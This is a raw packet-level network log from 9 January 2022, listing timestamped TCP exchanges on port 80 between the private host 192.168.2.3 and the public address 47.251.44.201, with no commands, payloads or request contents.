Jan 9, 2022 18:48:59.591166019 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.591204882 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591248035 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591259003 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.591296911 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591340065 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591351032 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.591388941 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591433048 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591443062 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.591507912 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591555119 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591566086 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.591624022 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591670990 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591706038 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.591768980 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591813087 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591834068 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.591905117 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591948986 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591959000 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.591998100 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592041016 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592051983 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.592089891 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592125893 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592142105 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.592191935 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592237949 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.592284918 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592322111 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592366934 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592398882 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.592433929 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592478037 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592508078 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.592552900 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592592955 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592611074 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.592649937 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592694044 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592706919 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.592763901 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592809916 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592820883 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.592920065 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.592966080 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.592988968 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593056917 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593096018 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593127966 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.593168020 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593204021 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593254089 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.593292952 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593344927 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.593383074 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593440056 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593485117 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593496084 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.593533993 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593576908 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593588114 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.593627930 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593673944 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593686104 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.593724966 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593770027 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593780994 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.593820095 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593863964 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.593878031 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.593957901 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594002008 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594036102 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.594073057 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594116926 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.594153881 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594192982 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594242096 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.594264984 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594304085 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594347954 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594357967 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.594397068 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594443083 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594455957 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.594515085 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594562054 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594574928 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.594641924 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594687939 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594700098 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.594755888 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594800949 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594827890 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.594871998 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594911098 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.594949961 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.595010996 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595052958 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.595104933 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595141888 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595185995 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595196962 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.595236063 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595273018 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595288992 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.595374107 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595413923 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595479012 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595489025 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.595524073 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.595545053 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595582008 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595632076 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595643997 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.595681906 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595724106 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595736980 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.595796108 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595845938 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595856905 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.595896959 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595932961 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.595951080 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.595988989 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596035004 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596045971 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.596085072 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596129894 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596141100 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.596199036 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596240044 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596257925 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.596297026 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596340895 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596352100 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.596390009 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596426964 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596442938 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.596481085 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596524954 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596535921 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.596594095 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596642971 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596654892 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.596693993 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596739054 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596750021 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.596788883 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596824884 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596841097 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.596930981 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.596977949 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.596997976 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.597035885 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.597078085 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.597089052 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.597129107 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.597186089 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.778970003 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779026985 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779067993 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779105902 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779130936 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.779155970 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.779195070 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779233932 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779273033 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779292107 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.779330969 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779376984 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779386997 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.779427052 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779464006 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779480934 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.779520988 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779565096 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779576063 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.779614925 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779655933 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779674053 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.779714108 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779752016 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779768944 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.779808998 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779846907 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779865026 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.779903889 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779939890 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.779954910 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.779994965 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780033112 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780050993 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.780090094 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780127048 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780143976 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.780183077 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780220032 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780235052 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.780275106 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780314922 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780332088 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.780370951 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780406952 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780424118 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.780463934 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780509949 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780522108 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.780560970 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780596972 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780615091 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.780653954 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780699015 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780709028 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.780747890 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780786991 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780802965 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.780842066 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780896902 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.780930996 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.780967951 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781013012 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781025887 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.781064034 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781101942 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781120062 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.781157970 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781194925 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781209946 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.781249046 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781292915 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781303883 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.781342983 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781378984 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781394005 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.781433105 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781471014 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781488895 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.781527996 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781570911 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781582117 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.781620979 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781665087 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781677008 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.781714916 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781759977 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781770945 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.781810045 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781846046 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781862974 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.781902075 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781945944 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.781958103 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.781996965 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782036066 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782052040 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.782090902 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782128096 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782144070 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.782181978 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782219887 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782236099 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.782274008 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782311916 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782349110 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782366991 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.782404900 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782422066 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.782459974 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782497883 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782515049 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.782552958 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782588959 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782605886 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.782653093 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782701015 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782711983 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.782751083 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782787085 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782803059 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.782840967 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782886982 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782897949 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.782937050 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782979965 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.782990932 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.783029079 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783065081 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783082008 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.783121109 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783165932 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783175945 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.783215046 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783250093 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783266068 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.783303976 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783341885 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783360004 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.783397913 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783436060 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783452034 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.783490896 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783526897 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783544064 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.783581972 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783627033 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783639908 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.783679008 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783715963 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783730984 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.783770084 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783813953 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783824921 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.783863068 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783907890 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783917904 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.783956051 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.783993006 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.784008026 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.784045935 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.784084082 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.784101963 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.784141064 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.784177065 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.784193993 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.784231901 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.784270048 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.784286022 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.784322023 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.784364939 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.858211994 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.861059904 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:49:00.040887117 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:49:02.275521994 CET	49882	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:49:02.450033903 CET	80	49882	47.251.44.201	192.168.2.3
Jan 9, 2022 18:49:02.450124025 CET	49882	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:49:02.450225115 CET	49882	80	192.168.2.3	47.251.44.201
